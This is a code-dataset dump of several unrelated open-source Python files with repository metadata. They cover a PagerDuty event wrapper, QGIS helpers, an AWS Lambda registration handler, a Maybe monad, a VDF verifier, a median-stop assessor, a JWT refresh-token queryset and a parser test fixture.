python_modules/libraries/dagster-pagerduty/dagster_pagerduty/resources.py
bambielli-flex/dagster
30b75ba7c62fc536bc827f177c1dc6ba20f5ae20
[ "Apache-2.0" ]
null
null
null
python_modules/libraries/dagster-pagerduty/dagster_pagerduty/resources.py
bambielli-flex/dagster
30b75ba7c62fc536bc827f177c1dc6ba20f5ae20
[ "Apache-2.0" ]
null
null
null
python_modules/libraries/dagster-pagerduty/dagster_pagerduty/resources.py
bambielli-flex/dagster
30b75ba7c62fc536bc827f177c1dc6ba20f5ae20
[ "Apache-2.0" ]
null
null
null
import pypd from dagster import resource, Dict, Field, String class PagerDutyService: '''Integrates with PagerDuty via the pypd library. See: https://v2.developer.pagerduty.com/docs/events-api-v2 https://v2.developer.pagerduty.com/docs/send-an-event-events-api-v2 https://support.pagerduty.com/docs/services-and-integrations#section-events-api-v2 https://github.com/PagerDuty/pagerduty-api-python-client for documentation and more information. ''' def __init__(self, routing_key): self.routing_key = routing_key def EventV2_create( self, summary, source, severity, event_action='trigger', dedup_key=None, timestamp=None, component=None, group=None, event_class=None, custom_details=None, ): '''Events API v2 enables you to add PagerDuty's advanced event and incident management functionality to any system that can make an outbound HTTP connection. Arguments: summary {string} -- A high-level, text summary message of the event. Will be used to construct an alert's description. Example: "PING OK - Packet loss = 0%, RTA = 1.41 ms" "Host 'acme-andromeda-sv1-c40 :: 179.21.24.50' is DOWN" source {string} -- Specific human-readable unique identifier, such as a hostname, for the system having the problem. Examples: "prod05.theseus.acme-widgets.com" "171.26.23.22" "aws:elasticache:us-east-1:852511987:cluster/api-stats-prod-003" "9c09acd49a25" severity {string} -- How impacted the affected system is. Displayed to users in lists and influences the priority of any created incidents. Must be one of {info, warning, error, critical} Keyword Arguments: event_action {str} -- There are three types of events that PagerDuty recognizes, and are used to represent different types of activity in your monitored systems. (default: 'trigger') * trigger: When PagerDuty receives a trigger event, it will either open a new alert, or add a new trigger log entry to an existing alert, depending on the provided dedup_key. Your monitoring tools should send PagerDuty a trigger when a new problem has been detected. You may send additional triggers when a previously detected problem has occurred again. * acknowledge: acknowledge events cause the referenced incident to enter the acknowledged state. While an incident is acknowledged, it won't generate any additional notifications, even if it receives new trigger events. Your monitoring tools should send PagerDuty an acknowledge event when they know someone is presently working on the problem. * resolve: resolve events cause the referenced incident to enter the resolved state. Once an incident is resolved, it won't generate any additional notifications. New trigger events with the same dedup_key as a resolved incident won't re-open the incident. Instead, a new incident will be created. Your monitoring tools should send PagerDuty a resolve event when the problem that caused the initial trigger event has been fixed. dedup_key {string} -- Deduplication key for correlating triggers and resolves. The maximum permitted length of this property is 255 characters. timestamp {string} -- Timestamp (ISO 8601). When the upstream system detected / created the event. This is useful if a system batches or holds events before sending them to PagerDuty. Optional - Will be auto-generated by PagerDuty if not provided. Example: 2015-07-17T08:42:58.315+0000 component {string} -- The part or component of the affected system that is broken. Examples: "keepalive" "webping" "mysql" "wqueue" group {string} -- A cluster or grouping of sources. For example, sources “prod-datapipe-02” and “prod-datapipe-03” might both be part of “prod-datapipe” Examples: "prod-datapipe" "www" "web_stack" event_class {string} -- The class/type of the event. Examples: "High CPU" "Latency" "500 Error" custom_details {Dict[str, str]} -- Additional details about the event and affected system. Example: {"ping time": "1500ms", "load avg": 0.75 } ''' data = { 'routing_key': self.routing_key, 'event_action': event_action, 'payload': {'summary': summary, 'source': source, 'severity': severity}, } if dedup_key is not None: data['dedup_key'] = dedup_key if timestamp is not None: data['payload']['timestamp'] = timestamp if component is not None: data['payload']['component'] = component if group is not None: data['payload']['group'] = group if event_class is not None: data['payload']['class'] = event_class if custom_details is not None: data['payload']['custom_details'] = custom_details return pypd.EventV2.create(data=data) @resource( config_field=Field( Dict( { 'routing_key': Field( String, description='''The routing key provisions access to your PagerDuty service. You will need to include the integration key for your new integration, as a routing_key in the event payload.''', ) } ) ), description='''This resource is for posting events to PagerDuty.''', ) def pagerduty_resource(context): return PagerDutyService(context.resource_config.get('routing_key'))
43.422619
100
0.522276
795a86deadc9e13fcfacfb72646c451738774ac0
307
py
Python
zang/domain/enums/call_direction.py
vlastikczech/zang-python
980f5243071404d6838554500a6955ff7bc2a0c7
[ "MIT" ]
null
null
null
zang/domain/enums/call_direction.py
vlastikczech/zang-python
980f5243071404d6838554500a6955ff7bc2a0c7
[ "MIT" ]
null
null
null
zang/domain/enums/call_direction.py
vlastikczech/zang-python
980f5243071404d6838554500a6955ff7bc2a0c7
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """ zang.domain.enums.call_direction ~~~~~~~~~~~~~~~~~~~ Module containing `CallDirection` available options """ from enum import Enum class CallDirection(Enum): INBOUND = 'inbound' OUTBOUND_API = 'outbound-api' OUTBOUND_DIAL = 'outbound-dial' UNKNOWN = 'unknown'
19.1875
51
0.651466
795a86fd90ed5cea3a38dc189b675e0f250d88ec
2,171
py
Python
utils.py
IHoldYA/urban_datasets
46501cbbe3b21b0110f479fc71b123a664ed720f
[ "MIT" ]
5
2021-04-17T13:03:16.000Z
2021-04-20T14:55:52.000Z
utils.py
IHoldYA/urban_datasets
46501cbbe3b21b0110f479fc71b123a664ed720f
[ "MIT" ]
null
null
null
utils.py
IHoldYA/urban_datasets
46501cbbe3b21b0110f479fc71b123a664ed720f
[ "MIT" ]
4
2021-04-19T01:21:10.000Z
2021-08-31T12:08:08.000Z
import qgis from qgis.core import * # from PyQt4.QtGui import * # from PyQt4.QtCore import * def add_feature(_v, _pr, feature): convexhull = feature.geometry().convexHull() f = QgsFeature() f.setGeometry(convexhull) f.setAttributes(['1']) _pr.addFeature(f) _v.updateExtents() _v.commitChanges() QgsProject.instance().addMapLayer(_v) return _v, _pr def add_polygon_to_layer(_attr, _coords, _layer, _pr): f = QgsFeature() _coords = [QgsPointXY(x[0], x[1]) for x in _coords] polygon = QgsGeometry.fromPolygonXY([_coords]) f.setGeometry(polygon) f.setAttributes(_attr) _pr.addFeature(f) _layer.updateExtents() def find_feature(center_point, _layer, categories=[]): for feature in _layer.getFeatures(): # takes 0.09 sec, 0.22 worst case if feature.geometry().contains( QgsPointXY(center_point[0], center_point[1])): if feature.attributes()[3] in categories: return feature def find_features_poly(feat, _layer): _total = 0 for _feature in _layer.getFeatures(): if feat.geometry().contains(_feature.geometry()): _total += _feature.geometry().area() return _total def get_feature_color(_layer, _feature): for cat in _layer[0].renderer().categories(): if cat.value() == _feature.attributes()[3]: print(cat.symbol().color()) return cat.symbol() def one_feature_layer(feature): _v, _pr = make_new_layer() _f = feature # f.setGeometry(feature.geometry()) _v, _pr = add_feature(_v, _pr, _f) return _v def pan(canvas, x, y): currExt = canvas.extent() canvasCenter = currExt.center() dx = x dy = y xMin = currExt.xMinimum() + dx xMax = currExt.xMaximum() + dx yMin = currExt.yMinimum() + dy yMax = currExt.yMaximum() + dy newRect = QgsRectangle(xMin, yMin, xMax, yMax) canvas.setExtent(newRect) canvas.refresh() def square_to_coord(square): """ Function that transforms a bounding box in a list of coordinates. :param square: bounding box as consequent points, list :return: list of coordinates, list """ _coords = [(square[0], square[1]), (square[0], square[3]), (square[2], square[3]), (square[2], square[1]), (square[0], square[1])] return _coords
25.244186
66
0.69415
795a87911bb3da41b1b3593814cd06e20d90ac34
4,475
py
Python
code/lambda/function/Auth/Register/app.py
Xchange-Taiwan/XChange-SSO-Architect
0bb56bcf8a849cf3b5858f0597696b5bae00de58
[ "Apache-2.0" ]
1
2021-08-31T04:23:12.000Z
2021-08-31T04:23:12.000Z
code/lambda/function/Auth/Register/app.py
Xchange-Taiwan/XChange-SSO-Architect
0bb56bcf8a849cf3b5858f0597696b5bae00de58
[ "Apache-2.0" ]
null
null
null
code/lambda/function/Auth/Register/app.py
Xchange-Taiwan/XChange-SSO-Architect
0bb56bcf8a849cf3b5858f0597696b5bae00de58
[ "Apache-2.0" ]
null
null
null
import json import os import logging from aws import helper from aws import federate from aws.helper import DeveloperMode logger = logging.getLogger() logger.setLevel(logging.INFO) USER_POOL_ID = os.environ["USER_POOL_ID"] USER_TABLE_NAME = os.environ["USER_TABLE_NAME"] @DeveloperMode(True) def lambda_handler(event, context): """ Lambda function to register a new user. description: This function is used to register a new user. The user is registered in the user pool and the user is added to the user table. if platform and platform token are provided, the user is federated to the platform. payload: email: email of the user password: password of the user client_id: client id of the client redirect_uri: client id of the redirect_uri optional: platform: platform to federate the user to dynamodb platform_id_token: token to federate the user to dynamodb platform_access_token: access token to federate the user to dynamodb """ input_json = dict() input_json = json.loads(event["body"]) # Input data validation ----- if not "email" in input_json: return helper.build_response( {"message": "E-mail address is required."}, 403) if not "password" in input_json: return helper.build_response({"message": "Password is required."}, 403) elif len(input_json["password"]) < 6: return helper.build_response( {"message": "Password must be at least 6 characters long."}, 403) if not "client_id" in input_json: return helper.build_response({"message": "`client_id` is required"}, 403) # data validated, assign to variables email = input_json["email"].lower() # store all emails as lower case password = input_json["password"] # verify the client_id and redirect_uri if not "client_id" in input_json or not "redirect_uri" in input_json: return helper.build_response( {"message": "You do not have permission to access this resource."}, 403) client_id = input_json["client_id"] redirect_uri = input_json["redirect_uri"] _, msg = helper.verify_client_id_and_redirect_uri( user_pool_id=USER_POOL_ID, client_id=client_id, redirect_uri=redirect_uri) if msg != None: logging.info(msg) return helper.build_response({"message": msg}, 403) # build client metadata for confirmation email ----- client_metadata = dict() if "agent" in input_json: client_metadata["agent"] = input_json["agent"] if "client_id" in input_json: client_metadata["client_id"] = input_json["client_id"] if "redirect_uri" in input_json: client_metadata["redirect_uri"] = input_json["redirect_uri"] # perform cognito register resp, msg = helper.register(user_pool_id=USER_POOL_ID, username=email, email=email, password=password, client_id=client_id, client_metadata=client_metadata) if msg != None: logging.info(msg) return helper.build_response({"message": msg}, 403) # get user info user_cognito_id = resp["UserSub"] # register the federate record in the user table if "platform_id_token" in input_json or "platform_access_token" in input_json: platform_login_data = dict() platform_login_data["platform"] = input_json["platform"] if "platform_code" in input_json: platform_login_data["code"] = input_json["platform_code"] if "platform_id_token" in input_json: platform_login_data["id_token"] = input_json["platform_id_token"] if "platform_access_token" in input_json: platform_login_data["access_token"] = input_json[ "platform_access_token"] feder_resp, msg = federate.verify_federate_and_register_or_get_user( user_table_name=USER_TABLE_NAME, platform_login_data=platform_login_data, user_cognito_id=user_cognito_id, cognito_email=email, mode="register") if msg != None: logging.info(msg) return helper.build_response({"message": msg}, 403) return helper.build_response({"message": msg}, 200)
36.382114
91
0.643799
795a87fe948b71dcac2e9aa8e2b1072905629fb0
12,892
py
Python
returns/maybe.py
MichaelAOlson/returns
56e0df46846890b1c33dd26216086f94269292ad
[ "BSD-2-Clause" ]
null
null
null
returns/maybe.py
MichaelAOlson/returns
56e0df46846890b1c33dd26216086f94269292ad
[ "BSD-2-Clause" ]
null
null
null
returns/maybe.py
MichaelAOlson/returns
56e0df46846890b1c33dd26216086f94269292ad
[ "BSD-2-Clause" ]
null
null
null
from abc import ABCMeta from functools import wraps from typing import ( Any, Callable, ClassVar, NoReturn, Optional, Type, TypeVar, Union, ) from typing_extensions import final from returns.interfaces.specific.maybe import MaybeBased2 from returns.primitives.container import BaseContainer, container_equality from returns.primitives.exceptions import UnwrapFailedError from returns.primitives.hkt import Kind1, SupportsKind1 # Definitions: _ValueType = TypeVar('_ValueType', covariant=True) _NewValueType = TypeVar('_NewValueType') # Aliases: _FirstType = TypeVar('_FirstType') _SecondType = TypeVar('_SecondType') class Maybe( BaseContainer, SupportsKind1['Maybe', _ValueType], MaybeBased2[_ValueType, None], metaclass=ABCMeta, ): """ Represents a result of a series of computations that can return ``None``. An alternative to using exceptions or constant ``is None`` checks. ``Maybe`` is an abstract type and should not be instantiated directly. Instead use ``Some`` and ``Nothing``. See also: - https://github.com/gcanti/fp-ts/blob/master/docs/modules/Option.ts.md """ _inner_value: Optional[_ValueType] #: Alias for `Nothing` empty: ClassVar['Maybe[Any]'] # These two are required for projects like `classes`: #: Success type that is used to represent the successful computation. success_type: ClassVar[Type['_Some']] #: Failure type that is used to represent the failed computation. failure_type: ClassVar[Type['_Nothing']] #: Typesafe equality comparison with other `Result` objects. equals = container_equality def map( # noqa: WPS125 self, function: Callable[[_ValueType], _NewValueType], ) -> 'Maybe[_NewValueType]': """ Composes successful container with a pure function. .. code:: python >>> from returns.maybe import Some, Nothing >>> def mappable(string: str) -> str: ... return string + 'b' >>> assert Some('a').map(mappable) == Some('ab') >>> assert Nothing.map(mappable) == Nothing """ def apply( self, function: Kind1['Maybe', Callable[[_ValueType], _NewValueType]], ) -> 'Maybe[_NewValueType]': """ Calls a wrapped function in a container on this container. .. code:: python >>> from returns.maybe import Some, Nothing >>> def appliable(string: str) -> str: ... return string + 'b' >>> assert Some('a').apply(Some(appliable)) == Some('ab') >>> assert Some('a').apply(Nothing) == Nothing >>> assert Nothing.apply(Some(appliable)) == Nothing >>> assert Nothing.apply(Nothing) == Nothing """ def bind( self, function: Callable[[_ValueType], Kind1['Maybe', _NewValueType]], ) -> 'Maybe[_NewValueType]': """ Composes successful container with a function that returns a container. .. code:: python >>> from returns.maybe import Nothing, Maybe, Some >>> def bindable(string: str) -> Maybe[str]: ... return Some(string + 'b') >>> assert Some('a').bind(bindable) == Some('ab') >>> assert Nothing.bind(bindable) == Nothing """ def bind_optional( self, function: Callable[[_ValueType], Optional[_NewValueType]], ) -> 'Maybe[_NewValueType]': """ Binds a function returning an optional value over a container. .. code:: python >>> from returns.maybe import Some, Nothing >>> from typing import Optional >>> def bindable(arg: str) -> Optional[int]: ... return len(arg) if arg else None >>> assert Some('a').bind_optional(bindable) == Some(1) >>> assert Some('').bind_optional(bindable) == Nothing """ def lash( self, function: Callable[[Any], Kind1['Maybe', _ValueType]], ) -> 'Maybe[_ValueType]': """ Composes failed container with a function that returns a container. .. code:: python >>> from returns.maybe import Maybe, Some, Nothing >>> def lashable(arg=None) -> Maybe[str]: ... return Some('b') >>> assert Some('a').lash(lashable) == Some('a') >>> assert Nothing.lash(lashable) == Some('b') We need this feature to make ``Maybe`` compatible with different ``Result`` like oeprations. """ def value_or( self, default_value: _NewValueType, ) -> Union[_ValueType, _NewValueType]: """ Get value from successful container or default value from failed one. .. code:: python >>> from returns.maybe import Nothing, Some >>> assert Some(0).value_or(1) == 0 >>> assert Nothing.value_or(1) == 1 """ def or_else_call( self, function: Callable[[], _NewValueType], ) -> Union[_ValueType, _NewValueType]: """ Get value from successful container or default value from failed one. Really close to :meth:`~Maybe.value_or` but works with lazy values. This method is unique to ``Maybe`` container, because other containers do have ``.alt`` method. But, ``Maybe`` does not have this method. There's nothing to ``alt`` in ``Nothing``. Instead, it has this method to execute some function if called on a failed container: .. code:: pycon >>> from returns.maybe import Some, Nothing >>> assert Some(1).or_else_call(lambda: 2) == 1 >>> assert Nothing.or_else_call(lambda: 2) == 2 It might be useful to work with exceptions as well: .. code:: pycon >>> def fallback() -> NoReturn: ... raise ValueError('Nothing!') >>> Nothing.or_else_call(fallback) Traceback (most recent call last): ... ValueError: Nothing! """ def unwrap(self) -> _ValueType: """ Get value from successful container or raise exception for failed one. .. code:: pycon :force: >>> from returns.maybe import Nothing, Some >>> assert Some(1).unwrap() == 1 >>> Nothing.unwrap() Traceback (most recent call last): ... returns.primitives.exceptions.UnwrapFailedError """ # noqa: RST399 def failure(self) -> None: """ Get failed value from failed container or raise exception from success. .. code:: pycon :force: >>> from returns.maybe import Nothing, Some >>> assert Nothing.failure() is None >>> Some(1).failure() Traceback (most recent call last): ... returns.primitives.exceptions.UnwrapFailedError """ # noqa: RST399 @classmethod def from_value( cls, inner_value: _NewValueType, ) -> 'Maybe[_NewValueType]': """ Creates new instance of ``Maybe`` container based on a value. .. code:: python >>> from returns.maybe import Maybe, Some >>> assert Maybe.from_value(1) == Some(1) >>> assert Maybe.from_value(None) == Some(None) """ return _Some(inner_value) @classmethod def from_optional( cls, inner_value: Optional[_NewValueType], ) -> 'Maybe[_NewValueType]': """ Creates new instance of ``Maybe`` container based on an optional value. .. code:: python >>> from returns.maybe import Maybe, Some, Nothing >>> assert Maybe.from_optional(1) == Some(1) >>> assert Maybe.from_optional(None) == Nothing """ if inner_value is None: return _Nothing(inner_value) return _Some(inner_value) @final class _Nothing(Maybe[Any]): """Represents an empty state.""" _inner_value: None def __init__(self, inner_value: None = None) -> None: # noqa: WPS632 """ Private constructor for ``_Nothing`` type. Use :attr:`~Nothing` instead. Wraps the given value in the ``_Nothing`` container. ``inner_value`` can only be ``None``. """ super().__init__(None) def __repr__(self): """ Custom ``str`` definition without the state inside. .. code:: python >>> from returns.maybe import Nothing >>> assert str(Nothing) == '<Nothing>' >>> assert repr(Nothing) == '<Nothing>' """ return '<Nothing>' def map(self, function): # noqa: WPS125 """Does nothing for ``Nothing``.""" return self def apply(self, container): """Does nothing for ``Nothing``.""" return self def bind(self, function): """Does nothing for ``Nothing``.""" return self def bind_optional(self, function): """Does nothing.""" return self def lash(self, function): """Composes this container with a function returning container.""" return function(None) def value_or(self, default_value): """Returns default value.""" return default_value def or_else_call(self, function): """Returns the result of a passed function.""" return function() def unwrap(self): """Raises an exception, since it does not have a value inside.""" raise UnwrapFailedError(self) def failure(self) -> None: """Returns failed value.""" return self._inner_value @final class _Some(Maybe[_ValueType]): """ Represents a calculation which has succeeded and contains the value. Quite similar to ``Success`` type. """ _inner_value: _ValueType def __init__(self, inner_value: _ValueType) -> None: """ Private type constructor. Please, use :func:`~Some` instead. Required for typing. """ super().__init__(inner_value) def map(self, function): # noqa: WPS125 """Composes current container with a pure function.""" return _Some(function(self._inner_value)) def apply(self, container): """Calls a wrapped function in a container on this container.""" if isinstance(container, self.success_type): return self.map(container.unwrap()) # type: ignore return container def bind(self, function): """Binds current container to a function that returns container.""" return function(self._inner_value) def bind_optional(self, function): """Binds a function returning an optional value over a container.""" return Maybe.from_optional(function(self._inner_value)) def lash(self, function): """Does nothing for ``Some``.""" return self def value_or(self, default_value): """Returns inner value for successful container.""" return self._inner_value def or_else_call(self, function): """Returns inner value for successful container.""" return self._inner_value def unwrap(self): """Returns inner value for successful container.""" return self._inner_value def failure(self): """Raises exception for successful container.""" raise UnwrapFailedError(self) Maybe.success_type = _Some Maybe.failure_type = _Nothing def Some(inner_value: _NewValueType) -> Maybe[_NewValueType]: # noqa: N802 """ Public unit function of protected :class:`~_Some` type. Can return ``Some(None)`` for passed ``None`` argument. Because ``Some(None)`` does make sense. .. code:: python >>> from returns.maybe import Some >>> assert str(Some(1)) == '<Some: 1>' >>> assert str(Some(None)) == '<Some: None>' """ return _Some(inner_value) #: Public unit value of protected :class:`~_Nothing` type. Nothing: Maybe[NoReturn] = _Nothing() Maybe.empty = Nothing def maybe( function: Callable[..., Optional[_ValueType]], ) -> Callable[..., Maybe[_ValueType]]: """ Decorator to convert ``None``-returning function to ``Maybe`` container. This decorator works with sync functions only. Example: .. code:: python >>> from typing import Optional >>> from returns.maybe import Nothing, Some, maybe >>> @maybe ... def might_be_none(arg: int) -> Optional[int]: ... if arg == 0: ... return None ... return 1 / arg >>> assert might_be_none(0) == Nothing >>> assert might_be_none(1) == Some(1.0) Requires our :ref:`mypy plugin <mypy-plugins>`. """ @wraps(function) def decorator(*args, **kwargs): return Maybe.from_optional(function(*args, **kwargs)) return decorator
27.844492
79
0.5944
795a884f783bd2c8e015c0684f7a1eb5e5b514b6
2,710
py
Python
cunt/types/blockchain_format/vdf.py
CallMeBrado/cunt-blockchain
9b140b7e5541f3baffabe02a55b75d9aeb889999
[ "Apache-2.0" ]
7
2021-08-09T19:01:51.000Z
2021-12-09T04:32:09.000Z
cunt/types/blockchain_format/vdf.py
CallMeBrado/cunt-blockchain
9b140b7e5541f3baffabe02a55b75d9aeb889999
[ "Apache-2.0" ]
22
2021-08-17T04:12:11.000Z
2022-03-29T04:10:38.000Z
cunt/types/blockchain_format/vdf.py
CallMeBrado/cunt-blockchain
9b140b7e5541f3baffabe02a55b75d9aeb889999
[ "Apache-2.0" ]
4
2021-09-05T12:04:51.000Z
2022-03-15T08:44:32.000Z
import logging import traceback from dataclasses import dataclass from enum import IntEnum from typing import Optional from functools import lru_cache from chiavdf import create_discriminant, verify_n_wesolowski from cunt.consensus.constants import ConsensusConstants from cunt.types.blockchain_format.classgroup import ClassgroupElement from cunt.types.blockchain_format.sized_bytes import bytes32, bytes100 from cunt.util.ints import uint8, uint64 from cunt.util.streamable import Streamable, streamable log = logging.getLogger(__name__) @lru_cache(maxsize=200) def get_discriminant(challenge, size_bites) -> int: return int( create_discriminant(challenge, size_bites), 16, ) @lru_cache(maxsize=1000) def verify_vdf( disc: int, input_el: bytes100, output: bytes, number_of_iterations: uint64, discriminant_size: int, witness_type: uint8, ): return verify_n_wesolowski( str(disc), input_el, output, number_of_iterations, discriminant_size, witness_type, ) @dataclass(frozen=True) @streamable class VDFInfo(Streamable): challenge: bytes32 # Used to generate the discriminant (VDF group) number_of_iterations: uint64 output: ClassgroupElement @dataclass(frozen=True) @streamable class VDFProof(Streamable): witness_type: uint8 witness: bytes normalized_to_identity: bool def is_valid( self, constants: ConsensusConstants, input_el: ClassgroupElement, info: VDFInfo, target_vdf_info: Optional[VDFInfo] = None, ) -> bool: """ If target_vdf_info is passed in, it is compared with info. """ if target_vdf_info is not None and info != target_vdf_info: tb = traceback.format_stack() log.error(f"{tb} INVALID VDF INFO. Have: {info} Expected: {target_vdf_info}") return False if self.witness_type + 1 > constants.MAX_VDF_WITNESS_SIZE: return False try: disc: int = get_discriminant(info.challenge, constants.DISCRIMINANT_SIZE_BITS) # TODO: parallelize somehow, this might included multiple mini proofs (n weso) return verify_vdf( disc, input_el.data, info.output.data + bytes(self.witness), info.number_of_iterations, constants.DISCRIMINANT_SIZE_BITS, self.witness_type, ) except Exception: return False # Stores, for a given VDF, the field that uses it. class CompressibleVDFField(IntEnum): CC_EOS_VDF = 1 ICC_EOS_VDF = 2 CC_SP_VDF = 3 CC_IP_VDF = 4
27.373737
90
0.673432
795a88a097dbd365fe7a55af55dc9b0fe6f11e08
4,359
py
Python
nni/algorithms/hpo/medianstop_assessor.py
nbl97/nni
1530339d3e964a5ea95a0afde1775ec9167cdcc0
[ "MIT" ]
2,305
2018-09-07T12:42:26.000Z
2019-05-06T20:14:24.000Z
nni/algorithms/hpo/medianstop_assessor.py
nbl97/nni
1530339d3e964a5ea95a0afde1775ec9167cdcc0
[ "MIT" ]
379
2018-09-10T10:19:50.000Z
2019-05-06T18:04:46.000Z
nni/algorithms/hpo/medianstop_assessor.py
nbl97/nni
1530339d3e964a5ea95a0afde1775ec9167cdcc0
[ "MIT" ]
314
2018-09-08T05:36:08.000Z
2019-05-06T08:48:51.000Z
# Copyright (c) Microsoft Corporation. # Licensed under the MIT license. from __future__ import annotations import logging from schema import Schema, Optional from typing_extensions import Literal from nni import ClassArgsValidator from nni.assessor import Assessor, AssessResult from nni.utils import extract_scalar_history logger = logging.getLogger('medianstop_Assessor') class MedianstopClassArgsValidator(ClassArgsValidator): def validate_class_args(self, **kwargs): Schema({ Optional('optimize_mode'): self.choices('optimize_mode', 'maximize', 'minimize'), Optional('start_step'): self.range('start_step', int, 0, 9999), }).validate(kwargs) class MedianstopAssessor(Assessor): """ The median stopping rule stops a pending trial X at step S if the trial’s best objective value by step S is strictly worse than the median value of the running averages of all completed trials’ objectives reported up to step S Paper: `Google Vizer: A Service for Black-Box Optimization <https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/46180.pdf>`__ Examples -------- .. code-block:: config.assessor.name = 'Medianstop' config.tuner.class_args = { 'optimize_mode': 'maximize', 'start_step': 5 } Parameters ---------- optimize_mode Whether optimize to minimize or maximize trial result. start_step A trial is determined to be stopped or not only after receiving start_step number of reported intermediate results. """ def __init__(self, optimize_mode: Literal['minimize', 'maximize'] = 'maximize', start_step: int = 0): self._start_step = start_step self._running_history = dict() self._completed_avg_history = dict() if optimize_mode == 'maximize': self._high_better = True elif optimize_mode == 'minimize': self._high_better = False else: self._high_better = True logger.warning('unrecognized optimize_mode %s', optimize_mode) def _update_data(self, trial_job_id, trial_history): """update data Parameters ---------- trial_job_id : int trial job id trial_history : list The history performance matrix of each trial """ if trial_job_id not in self._running_history: self._running_history[trial_job_id] = [] self._running_history[trial_job_id].extend(trial_history[len(self._running_history[trial_job_id]):]) def trial_end(self, trial_job_id, success): if trial_job_id in self._running_history: if success: cnt = 0 history_sum = 0 self._completed_avg_history[trial_job_id] = [] for each in self._running_history[trial_job_id]: cnt += 1 history_sum += each self._completed_avg_history[trial_job_id].append(history_sum / cnt) self._running_history.pop(trial_job_id) else: logger.warning('trial_end: trial_job_id does not exist in running_history') def assess_trial(self, trial_job_id, trial_history): curr_step = len(trial_history) if curr_step < self._start_step: return AssessResult.Good scalar_trial_history = extract_scalar_history(trial_history) self._update_data(trial_job_id, scalar_trial_history) if self._high_better: best_history = max(scalar_trial_history) else: best_history = min(scalar_trial_history) avg_array = [] for id_ in self._completed_avg_history: if len(self._completed_avg_history[id_]) >= curr_step: avg_array.append(self._completed_avg_history[id_][curr_step - 1]) if avg_array: avg_array.sort() if self._high_better: median = avg_array[(len(avg_array)-1) // 2] return AssessResult.Bad if best_history < median else AssessResult.Good else: median = avg_array[len(avg_array) // 2] return AssessResult.Bad if best_history > median else AssessResult.Good else: return AssessResult.Good
36.630252
108
0.645102
795a88b56d209b20aa30b5b34d5c8fc153397e0b
580
py
Python
graphql_jwt/refresh_token/managers.py
ibqn/django-graphql-jwt
dd92319071092bb517187904f3ac0610e8443edf
[ "MIT" ]
24
2020-09-05T17:34:16.000Z
2022-03-17T11:45:55.000Z
graphql_jwt/refresh_token/managers.py
ibqn/django-graphql-jwt
dd92319071092bb517187904f3ac0610e8443edf
[ "MIT" ]
16
2020-09-05T16:55:49.000Z
2022-03-20T16:44:25.000Z
graphql_jwt/refresh_token/managers.py
ibqn/django-graphql-jwt
dd92319071092bb517187904f3ac0610e8443edf
[ "MIT" ]
12
2020-09-15T21:53:48.000Z
2022-03-20T15:07:43.000Z
from django.db import models from django.db.models import Case from django.db.models import Value as V from django.db.models import When from django.utils import timezone from ..settings import jwt_settings class RefreshTokenQuerySet(models.QuerySet): def expired(self): expires = timezone.now() - jwt_settings.JWT_REFRESH_EXPIRATION_DELTA return self.annotate( expired=Case( When(created__lt=expires, then=V(True)), output_field=models.BooleanField(), default=V(False), ), )
27.619048
76
0.663793
795a8a1f7fa2de24a9dc525ced9ad2cbe7a4795b
1,964
py
Python
src/genie/libs/parser/nxos/tests/ShowBgpSessions/cli/equal/golden_output_1_expected.py
balmasea/genieparser
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
[ "Apache-2.0" ]
204
2018-06-27T00:55:27.000Z
2022-03-06T21:12:18.000Z
src/genie/libs/parser/nxos/tests/ShowBgpSessions/cli/equal/golden_output_1_expected.py
balmasea/genieparser
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
[ "Apache-2.0" ]
468
2018-06-19T00:33:18.000Z
2022-03-31T23:23:35.000Z
src/genie/libs/parser/nxos/tests/ShowBgpSessions/cli/equal/golden_output_1_expected.py
balmasea/genieparser
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
[ "Apache-2.0" ]
309
2019-01-16T20:21:07.000Z
2022-03-30T12:56:41.000Z
expected_output = { "total_peers": 3, "total_established_peers": 2, "local_as": 333, "vrf": { "default": { "router_id": "10.106.0.6", "neighbor": { "10.106.102.4": { "last_flap": "01:03:35", "last_write": "00:00:09", "last_read": "00:00:41", "remote_port": 36462, "notifications_sent": 0, "local_port": 179, "notifications_received": 0, "connections_dropped": 0, "state": "established", "remote_as": 333 }, "10.106.101.1": { "last_flap": "01:03:35", "last_write": "00:00:09", "last_read": "00:00:41", "remote_port": 48392, "notifications_sent": 0, "local_port": 179, "notifications_received": 0, "connections_dropped": 0, "state": "established", "remote_as": 333 }, "10.106.102.3": { "last_flap": "01:03:39", "last_write": "never", "last_read": "never", "remote_port": 0, "notifications_sent": 0, "local_port": 0, "notifications_received": 0, "connections_dropped": 0, "state": "idle", "remote_as": 888 } }, "vrf_peers": 3, "vrf_established_peers": 2, "local_as": 333 }, "vpn1": { "router_id": "10.229.11.11", "vrf_peers": 0, "vrf_established_peers": 0, "local_as": 333 } } }
32.733333
49
0.362016
795a8a34ae82d60290c7038cc4879c1b1b1dce14
410
py
Python
devops/girder/plugins/AnnotationPlugin/upenncontrast_annotation/test/conftest.py
zjniu/UPennContrast
7924e68ab01088dd515ef99c0aff4134384b0701
[ "Apache-2.0" ]
null
null
null
devops/girder/plugins/AnnotationPlugin/upenncontrast_annotation/test/conftest.py
zjniu/UPennContrast
7924e68ab01088dd515ef99c0aff4134384b0701
[ "Apache-2.0" ]
null
null
null
devops/girder/plugins/AnnotationPlugin/upenncontrast_annotation/test/conftest.py
zjniu/UPennContrast
7924e68ab01088dd515ef99c0aff4134384b0701
[ "Apache-2.0" ]
null
null
null
import pytest from girder import events def unbindGirderEventsByHandlerName(handlerName): for eventName in events._mapping: events.unbind(eventName, handlerName) @pytest.fixture def unbindLargeImage(db): yield True unbindGirderEventsByHandlerName('large_image') @pytest.fixture def unbindAnnotation(db): yield True unbindGirderEventsByHandlerName('upenncontrast_annotation')
19.52381
63
0.785366
795a8a7708cbea16df97b1d939046b88dab2cab2
121,448
py
Python
sklearn/utils/estimator_checks.py
boricles/scikit-learn
373946ec9e3c72116bfbf7fab051cf4797d13e0f
[ "BSD-3-Clause" ]
1
2021-03-28T08:57:36.000Z
2021-03-28T08:57:36.000Z
sklearn/utils/estimator_checks.py
abhinav2301/scikit-learn
896d4fad106c8f1d745923d544b44a0707103aa2
[ "BSD-3-Clause" ]
null
null
null
sklearn/utils/estimator_checks.py
abhinav2301/scikit-learn
896d4fad106c8f1d745923d544b44a0707103aa2
[ "BSD-3-Clause" ]
null
null
null
